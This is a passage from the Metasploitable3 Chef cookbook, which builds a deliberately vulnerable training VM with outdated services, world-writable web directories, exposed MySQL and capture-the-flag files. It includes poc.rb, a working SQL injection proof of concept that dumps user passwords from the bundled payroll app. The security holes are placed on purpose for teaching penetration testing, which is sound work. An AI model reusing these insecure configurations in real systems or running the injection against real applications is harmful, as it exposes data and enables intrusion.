https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/2_of_spades.pcapng -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/5_of_hearts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/5_of_hearts.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/7_of_diamonds.zip: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/7_of_diamonds.zip -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/8_of_hearts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/8_of_hearts.zip -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | MAINTAINER Metasploitable "msfdev@rapid7.com" 3 | 4 | ADD 7_of_diamonds.zip /home/7_of_diamonds.zip 5 | 6 | WORKDIR /home -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/five_of_diamonds: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/five_of_diamonds -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/five_of_diamonds_srv: -------------------------------------------------------------------------------- 1 | description 'Run vulnerable custom http on 8989' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | exec "/opt/knock_knock/five_of_diamonds" 6 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/flag_images/10 of spades.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/flag_images/10 of spades.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/flag_images/3 of hearts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/flag_images/3 of hearts.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/flag_images/8 of clubs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/flag_images/8 of clubs.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/joker.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/joker.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/king_of_spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/king_of_spades.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/my_recordings_do_not_open.iso: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/my_recordings_do_not_open.iso -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/knockd/knockd: -------------------------------------------------------------------------------- 1 | ################################################ 2 | # 3 | # knockd's default file, for generic sys config 4 | # 5 | ################################################ 6 | 7 | # control if we start knockd at init or not 8 | # 1 = start 9 | # anything else = don't start 10 | # 11 | # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING 12 | START_KNOCKD=1 13 | 14 | # command line options 15 | #KNOCKD_OPTS="-i eth1" -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/payroll_app/poc.rb: -------------------------------------------------------------------------------- 1 | require 'net/http' 2 | 3 | url = "http://127.0.0.1/payroll_app.php" 4 | uri = URI(url) 5 | user = 'luke_skywalker' 6 | injection = "password'; select password from users where username='' OR ''='" 7 | 8 | puts "Making POST request to #{uri} with the following parameters:" 9 | puts "'user' = #{user}" 10 | puts "'password' = #{injection}" 11 | res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK') 12 | 13 | puts "Response body is #{res.body}" 14 | puts "Done" 15 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/phpmyadmin/config.inc.php: -------------------------------------------------------------------------------- 1 | 31 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/proftpd/hosts_renewer.conf: -------------------------------------------------------------------------------- 1 | description 'Run 
hosts renewer' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | script 6 | ruby /opt/proftpd/hosts_renewer.rb 7 | end script -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/proftpd/proftpd: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ### BEGIN INIT INFO 3 | # Provides: proftpd 4 | # Required-Start: $local_fs 5 | # Required-Stop: $local_fs 6 | # Default-Start: 2 3 4 5 7 | # Default-Stop: 0 1 6 8 | # X-Interactive: false 9 | # Short-Description: Init script for proftpd 10 | # Description: Start/stop proftpd 11 | ### END INIT INFO 12 | 13 | DESC="proftpd" 14 | NAME=proftpd 15 | #DAEMON= 16 | 17 | do_start() 18 | { 19 | echo "Starting proftpd."; 20 | /opt/proftpd/sbin/proftpd 21 | } 22 | 23 | do_stop() 24 | { 25 | echo "Stopping proftpd." 26 | killall proftpd 27 | } 28 | 29 | 30 | case "$1" in 31 | start) 32 | do_start 33 | ;; 34 | stop) 35 | do_stop 36 | ;; 37 | esac 38 | 39 | exit 0 -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/proftpd/proftpd_ip_renewer.conf: -------------------------------------------------------------------------------- 1 | description 'Run proftpd IP renewer' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | script 6 | ruby /opt/proftpd/proftpd_ip_renewer.rb 7 | end script -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/readme_app/readme_app.conf: -------------------------------------------------------------------------------- 1 | description 'Run ReadMe App' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | 6 | script 7 | sudo -u chewbacca /opt/readme_app/start.sh 8 | end script 9 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/samba/passdb.tdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/samba/passdb.tdb -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/Gemfile: -------------------------------------------------------------------------------- 1 | source 'https://rubygems.org' 2 | gem 'rack', '2.0.1' 3 | gem 'sinatra', '2.0.0rc2' 4 | gem 'erubis' 5 | gem 'activesupport' 6 | gem 'obfuscate' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/aws/loader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/sinatra/aws/loader -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/sinatra.conf: -------------------------------------------------------------------------------- 1 | description 'Run vulnerable Sinatra' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | chdir /opt/sinatra/ 6 | script 7 | echo "Starting sinatra" 8 | /opt/sinatra/server 9 | end script -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/sinatra/virtualbox/loader: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/sinatra/virtualbox/loader -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/unrealircd/unrealircd: 
-------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ### BEGIN INIT INFO 3 | # Provides: unrealircd 4 | # Required-Start: $local_fs 5 | # Required-Stop: $local_fs 6 | # Default-Start: 2 3 4 5 7 | # Default-Stop: 0 1 6 8 | # X-Interactive: false 9 | # Short-Description: Init script for unrealircd 10 | # Description: Start/stop unrealircd 11 | ### END INIT INFO 12 | 13 | DESC="unrealircd" 14 | NAME=unrealircd 15 | #DAEMON= 16 | 17 | do_start() 18 | { 19 | sudo -u boba_fett /opt/unrealircd/Unreal3.2/unreal start 20 | } 21 | 22 | do_stop() 23 | { 24 | /opt/unrealircd/Unreal3.2/unreal stop 25 | } 26 | 27 | 28 | case "$1" in 29 | start) 30 | do_start 31 | ;; 32 | stop) 33 | do_stop 34 | ;; 35 | esac 36 | 37 | exit 0 -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'metasploitable' 2 | maintainer 'Rapid7' 3 | maintainer_email '' 4 | license 'BSD-3-clause' 5 | description 'Installs/Configures metasploitable3' 6 | long_description 'Installs/Configures metasploitable3' 7 | version '0.1.0' 8 | 9 | # The `issues_url` points to the location where issues for this cookbook are 10 | # tracked. A `View Issues` link will be displayed on this cookbook's page when 11 | # uploaded to a Supermarket. 12 | # 13 | # issues_url 'https://github.com//metasploitable3/issues' if respond_to?(:issues_url) 14 | 15 | # The `source_url` points to the development repository for this cookbook. A 16 | # `View Source` link will be displayed on this cookbook's page when uploaded to 17 | # a Supermarket.
18 | # 19 | # source_url 'https://github.com//metasploitable3' if respond_to?(:source_url) 20 | 21 | depends 'apt', '~> 7.2' 22 | depends 'docker', '~> 4.9' 23 | depends 'mysql', '~> 8.3' 24 | depends 'iptables', '~> 4.5' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/apache.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: apache 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '1_apache' do 10 | lines "-A INPUT -p tcp --dport 80 -j ACCEPT" 11 | end 12 | 13 | package 'apache2' do 14 | action :install 15 | end 16 | 17 | directory '/var/www/cgi-bin' do 18 | mode '0755' 19 | recursive true 20 | end 21 | 22 | directory '/var/www/uploads' do 23 | mode '0777' 24 | recursive true 25 | end 26 | 27 | cookbook_file '/var/www/cgi-bin/hello_world.sh' do 28 | source 'apache/hello_world.sh' 29 | mode '0755' 30 | end 31 | 32 | cookbook_file '/etc/apache2/conf-available/cgi-bin.conf' do 33 | source 'apache/cgi-bin.conf' 34 | mode '0644' 35 | end 36 | 37 | cookbook_file '/etc/apache2/conf-available/dav.conf' do 38 | source 'apache/dav.conf' 39 | mode '0644' 40 | end 41 | 42 | bash "configure cgi" do 43 | code <<-EOH 44 | a2enmod cgi 45 | a2enconf cgi-bin 46 | a2disconf serve-cgi-bin 47 | EOH 48 | end 49 | 50 | bash "configure webDAV" do 51 | code <<-EOH 52 | a2enmod dav 53 | a2enmod dav_fs 54 | a2enmod dav_lock 55 | a2enmod auth_digest 56 | a2enconf dav 57 | EOH 58 | end 59 | 60 | execute 'make /var/www/html writeable' do 61 | command 'chmod o+w /var/www/html' 62 | end 63 | 64 | file '/var/www/html/index.html' do 65 | action :delete 66 | only_if { File.exists?('/var/www/html/index.html') } 67 | end 68 | 69 | service 'apache2' do 70 | action [:enable, :start] 71 | end 72 | 
-------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/apache_continuum.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: apache_continuum 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '01_apache_continuum' do 10 | lines "-A INPUT -p tcp --dport 8080 -j ACCEPT" 11 | end 12 | 13 | package 'openjdk-6-jre' 14 | package 'openjdk-6-jdk' 15 | 16 | directory node[:apache_continuum][:install_dir] do 17 | owner 'root' 18 | group 'root' 19 | mode '0644' 20 | end 21 | 22 | remote_file "#{Chef::Config[:file_cache_path]}/#{node[:apache_continuum][:tar]}" do 23 | source "#{node[:apache_continuum][:download_url]}/#{node[:apache_continuum][:tar]}" 24 | mode '0644' 25 | end 26 | 27 | execute "extract apache continum" do 28 | cwd Chef::Config[:file_cache_path] 29 | command "tar -xvzf #{node[:apache_continuum][:tar]} -C #{node[:apache_continuum][:install_dir]}" 30 | 31 | not_if { ::File.exists?(File.join(node[:apache_continuum][:install_dir], 'apache-continuum-1.4.2'))} 32 | end 33 | 34 | bash 'Download and extract Apache Continuum 1.4.2' do 35 | cwd File.join(node[:apache_continuum][:install_dir],'apache-continuum-1.4.2') 36 | code <<-EOH 37 | rm bin/wrapper-linux-x86-32 38 | rm -rf data 39 | tar --warning=no-unknown-keyword -xvzf #{File.join(Chef::Config[:file_cache_path], 'cookbooks', 'metasploitable', 'files', 'apache_continuum', 'data.tar.gz')} -C #{File.join(node[:apache_continuum][:install_dir], 'apache-continuum-1.4.2')} 40 | EOH 41 | end 42 | 43 | link '/etc/init.d/continuum' do 44 | to File.join(node[:apache_continuum][:install_dir], 'apache-continuum-1.4.2', 'bin', 'continuum') 45 | end 46 | 47 | execute "set port for apache continuum" do 48 | command 'update-rc.d continuum defaults 80' 49 | end 50 | 51 | service 'continuum' do 52 | action 
[:enable, :start] 53 | end 54 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/chatbot.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: chatbot 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | 9 | include_recipe 'metasploitable::ruby23' 10 | include_recipe 'metasploitable::nodejs' 11 | include_recipe 'iptables::default' 12 | 13 | iptables_rule '1_chatbot_ui' do 14 | lines "-A INPUT -p tcp --dport 80 -j ACCEPT" 15 | end 16 | 17 | iptables_rule '1_chatbot_nodejs' do 18 | lines "-A INPUT -p tcp --dport 3000 -j ACCEPT" 19 | end 20 | 21 | package 'unzip' 22 | 23 | bash "Install dependencies" do 24 | code <<-EOH 25 | npm install express 26 | npm install cors 27 | EOH 28 | end 29 | 30 | cookbook_file '/tmp/chatbot.zip' do 31 | source 'chatbot/chatbot.zip' 32 | mode '0700' 33 | end 34 | 35 | execute 'unzip chatbot' do 36 | command 'unzip /tmp/chatbot.zip -d /opt' 37 | only_if { Dir['/opt/chatbot'].empty? 
} 38 | notifies :run, 'execute[chown chatbot]', :immediately 39 | notifies :run, 'execute[chmod chatbot]', :immediately 40 | notifies :run, 'execute[install chatbot]', :immediately 41 | end 42 | 43 | execute 'chown chatbot' do 44 | command "chown -R root:root /opt/chatbot" 45 | end 46 | 47 | execute 'chmod chatbot' do 48 | command 'chmod -R 700 /opt/chatbot' 49 | end 50 | 51 | execute 'install chatbot' do 52 | command '/opt/chatbot/install.sh' 53 | not_if { File.exists?( '/etc/init/chatbot.conf' ) } 54 | end 55 | 56 | service 'chatbot' do 57 | supports restart: false, start: true, reload: false, status: false 58 | action [:enable, :start] 59 | end 60 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/clear_cache.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: clear_cache 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | # 'clear cache and backup that might contain sensitive information' do 8 | directory '/var/chef' do 9 | action :delete 10 | recursive true 11 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/cups.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: cups 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
6 | 7 | include_recipe 'iptables::default' 8 | 9 | package 'cups' do 10 | action :install 11 | end 12 | 13 | cookbook_file '/etc/cups/cupsd.conf' do 14 | source 'cups/cupsd.conf' 15 | mode '0644' 16 | end 17 | 18 | iptables_rule '1_cups' do 19 | lines "-A INPUT -p tcp --dport 631 -j ACCEPT" 20 | end 21 | 22 | service 'cups' do 23 | action [:enable, :restart] 24 | end 25 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/docker.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: docker 4 | # 5 | 6 | docker_service 'default' do 7 | install_method 'package' 8 | version '18.06.1' 9 | action [:create, :start] 10 | group 'docker' 11 | end 12 | 13 | group 'docker' do 14 | action [:create, :modify] 15 | append true 16 | members node[:metasploitable][:docker_users] 17 | end 18 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/ifnames.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: ifnames 4 | # 5 | 6 | # block udev persistent net rules for consistent interface naming after cloning 7 | link '/etc/udev/rules.d/75-persistent-net-generator.rules' do 8 | to '/dev/null' 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/iptables.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 
| # Recipe:: iptables 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '00_established' do 10 | lines '-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT' 11 | end 12 | 13 | iptables_rule '00_lo_allow_in' do 14 | lines '-I INPUT -i lo -j ACCEPT' 15 | end 16 | 17 | iptables_rule '00_lo_allow_out' do 18 | lines '-I OUTPUT -o lo -j ACCEPT' 19 | end 20 | 21 | iptables_rule '01_ssh' do 22 | lines "-A INPUT -p tcp --dport 22 -j ACCEPT" 23 | end 24 | 25 | iptables_rule '01_icmp' do 26 | lines "-A INPUT -p icmp -j ACCEPT" 27 | end 28 | 29 | iptables_rule '999_drop_all' do 30 | lines '-A INPUT -j DROP' 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/knockd.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: knockd 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | package 'knockd' do 8 | action :install 9 | end 10 | 11 | template '/etc/knockd.conf' do 12 | source 'knockd/knockd.conf.erb' 13 | mode '0600' 14 | end 15 | 16 | cookbook_file '/etc/default/knockd' do 17 | source 'knockd/knockd' 18 | mode '0600' 19 | end 20 | 21 | execute 'remove_carriage_returns' do 22 | command "sed -i -e 's/\r//g' /etc/default/knockd" 23 | end 24 | 25 | iptables_rule '1_knockd' do 26 | lines "-I FORWARD 1 -p tcp -m tcp --dport #{node[:flags][:five_of_diamonds][:vuln_port]} -j DROP" 27 | end 28 | 29 | service 'knockd' do 30 | action [:enable, :start] 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/mysql.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: mysql 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
6 | 7 | include_recipe 'iptables::default' 8 | 9 | iptables_rule '1_mysql' do 10 | lines "-A INPUT -p tcp --dport 3306 -j ACCEPT" 11 | end 12 | 13 | mysql_service 'default' do 14 | initial_root_password "#{node[:mysql][:root_password]}" 15 | bind_address '0.0.0.0' 16 | port '3306' 17 | action [:create, :start] 18 | end 19 | 20 | mysql_client 'default' do 21 | action :create 22 | end 23 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/nodejs.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: nodejs 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | execute 'add nodejs 4 repository' do 9 | command 'curl -sL https://deb.nodesource.com/setup_4.x | sudo -E bash -' 10 | not_if { ::File.exist?('/usr/bin/node') } 11 | end 12 | 13 | package 'nodejs' do 14 | options '--force-yes' 15 | end 16 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/payroll_app.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: payroll_app 4 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
5 | 6 | include_recipe 'metasploitable::mysql' 7 | include_recipe 'metasploitable::apache' 8 | include_recipe 'metasploitable::php_545' 9 | 10 | poc_dir = "/home/#{node[:users][node[:users].keys.last][:username]}/poc/payroll_app/" 11 | 12 | cookbook_file '/var/www/html/payroll_app.php' do 13 | source 'payroll_app/payroll_app.php' 14 | mode '0755' 15 | end 16 | 17 | template '/tmp/payroll.sql' do 18 | source 'payroll_app/payroll.sql.erb' 19 | mode '0755' 20 | end 21 | 22 | directory poc_dir do 23 | mode '0755' 24 | owner node[:users][node[:users].keys.last][:username] 25 | recursive true 26 | end 27 | 28 | cookbook_file "#{poc_dir}/poc.rb" do 29 | source 'payroll_app/poc.rb' 30 | mode '0755' 31 | end 32 | 33 | bash 'create payroll database and import data' do 34 | code <<-EOH 35 | mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="#{node[:mysql][:root_password]}" --execute="DROP DATABASE IF EXISTS payroll; CREATE DATABASE payroll;" 36 | mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="#{node[:mysql][:root_password]}" payroll < /tmp/payroll.sql 37 | EOH 38 | end 39 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/phpmyadmin.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: phpmyadmin 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
6 | 7 | include_recipe 'metasploitable::mysql' 8 | include_recipe 'metasploitable::apache' 9 | include_recipe 'metasploitable::php_545' 10 | 11 | bash "download and extract phpmyadmin" do 12 | code <<-EOH 13 | wget -c -t 3 --no-check-certificate -O /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz https://files.phpmyadmin.net/phpMyAdmin/3.5.8/phpMyAdmin-3.5.8-all-languages.tar.gz 14 | echo "a129d4f03901c047799f634b122734ab687b48975563c87adbf5dea679676e11 /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz" | shasum -a 256 --check --status 15 | tar xvfz /tmp/phpMyAdmin-3.5.8-all-languages.tar.gz -C /var/www/html 16 | mv /var/www/html/phpMyAdmin-3.5.8-all-languages /var/www/html/phpmyadmin 17 | EOH 18 | not_if { ::File.exists?('/var/www/html/phpmyadmin') } 19 | end 20 | 21 | cookbook_file 'var/www/html/phpmyadmin/config.inc.php' do 22 | source 'phpmyadmin/config.inc.php' 23 | end 24 | 25 | service 'apache2' do 26 | action [:restart] 27 | end 28 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/readme_app.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: readme_app 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
6 | # 7 | # 8 | 9 | include_recipe 'metasploitable::ruby23' 10 | include_recipe 'metasploitable::nodejs' 11 | include_recipe 'iptables::default' 12 | 13 | recipe_port = 3500 14 | 15 | iptables_rule '1_readme_app' do 16 | lines "-A INPUT -p tcp --dport #{recipe_port} -j ACCEPT" 17 | end 18 | 19 | package 'git' 20 | 21 | git '/opt/readme_app' do 22 | repository 'https://github.com/jbarnett-r7/metasploitable3-readme.git' 23 | action :checkout 24 | end 25 | 26 | directory '/opt/readme_app' do 27 | owner 'chewbacca' 28 | group 'users' 29 | mode '0644' 30 | end 31 | 32 | template '/opt/readme_app/start.sh' do 33 | variables( readme_app_port: recipe_port ) 34 | source 'readme_app/start.sh.erb' 35 | end 36 | 37 | cookbook_file '/etc/init/readme_app.conf' do 38 | source 'readme_app/readme_app.conf' 39 | mode '0644' 40 | end 41 | 42 | bash 'set permissions' do 43 | cwd '/opt/readme_app' 44 | code <<-EOH 45 | chown -R chewbacca:users . 46 | git ls-files | xargs chmod 0644 47 | git ls-files | xargs -n 1 dirname | uniq | xargs chmod 755 48 | chmod 0755 ./start.sh 49 | EOH 50 | end 51 | 52 | service 'readme_app' do 53 | supports restart: false, start: true, reload: false, status: false 54 | action [:enable, :start] 55 | end 56 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/ruby23.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: ruby23 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
6 | # 7 | # 8 | 9 | apt_repository 'rvm' do 10 | uri 'ppa:brightbox/ruby-ng' 11 | end 12 | 13 | package 'ruby2.3' 14 | package 'ruby2.3-dev' 15 | package 'bundler' 16 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/samba.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: samba 3 | # Recipe:: samba 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | include_recipe 'iptables::default' 9 | 10 | iptables_rule '1_samba' do 11 | lines "-A INPUT -p tcp --dport 445 -j ACCEPT" 12 | end 13 | 14 | package 'samba' 15 | 16 | cookbook_file '/etc/samba/smb.conf' do 17 | source 'samba/smb.conf' 18 | end 19 | 20 | cookbook_file '/var/lib/samba/private/passdb.tdb' do 21 | source 'samba/passdb.tdb' 22 | mode '0600' 23 | end 24 | 25 | service 'smbd' do 26 | action [:enable, :restart] 27 | end 28 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/sinatra.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: sinatra 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | # 7 | # 8 | 9 | include_recipe 'metasploitable::sinatra' 10 | include_recipe 'metasploitable::ruby23' 11 | include_recipe 'iptables::default' 12 | 13 | iptables_rule '1_sinatra' do 14 | lines "-A INPUT -p tcp --dport 8181 -j ACCEPT" 15 | end 16 | 17 | server_path = node['ec2'] ? 
'aws' : 'virtualbox' 18 | 19 | directory '/opt/sinatra' do 20 | mode '0777' 21 | end 22 | 23 | directory '/var/opt/sinatra' do 24 | mode '0777' 25 | end 26 | 27 | cookbook_file '/opt/sinatra/Gemfile' do 28 | source 'sinatra/Gemfile' 29 | mode '0777' 30 | end 31 | 32 | cookbook_file '/opt/sinatra/server' do 33 | source "sinatra/#{server_path}/loader" 34 | mode '0777' 35 | end 36 | 37 | cookbook_file '/etc/init/sinatra.conf' do 38 | source 'sinatra/sinatra.conf' 39 | mode '0777' 40 | end 41 | 42 | service 'sinatra' do 43 | supports restart: false, start: true, reload: false, status: false 44 | action [:enable, :start] 45 | end 46 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/sshd.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: sshd 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | cookbook_file '/etc/ssh/sshd_config' do 8 | source 'sshd/sshd_config' 9 | mode '0644' 10 | end 11 | 12 | service 'ssh' do 13 | action :restart 14 | end 15 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/users.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: users 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 
6 | 7 | uid = 1111 8 | 9 | node[:users].each do |u, attributes| 10 | user attributes[:username] do 11 | manage_home true 12 | password attributes[:password_hash] 13 | uid uid 14 | gid 100 15 | home "/home/#{attributes[:username]}" 16 | shell '/bin/bash' 17 | end 18 | uid += 1 19 | end 20 | 21 | administrator_members = node[:users].keys.find_all { |user| node[:users][user][:admin] == true } 22 | 23 | group 'sudo' do 24 | action :modify 25 | members administrator_members.map { |u| node[:users][u][:username] } 26 | append true 27 | end 28 | 29 | 30 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/recipes/vm_tools.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Recipe:: vm_tools 4 | # 5 | # Copyright:: 2017, Rapid7, All Rights Reserved. 6 | 7 | if node['virtualization']['system'].match /vbox/ 8 | # This assumes the VBoxGuestAdditions.iso was added to the user's home folder in Packer 9 | bash "Install VirtualBox Guest Tools" do 10 | code <<-EOH 11 | mount /home/vagrant/VBoxGuestAdditions.iso /mnt 12 | cd /mnt 13 | ./VBoxLinuxAdditions.run 14 | EOH 15 | end 16 | end -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/spec/spec_helper.rb: -------------------------------------------------------------------------------- 1 | require 'chefspec' 2 | require 'chefspec/berkshelf' 3 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/spec/unit/recipes/default_spec.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: 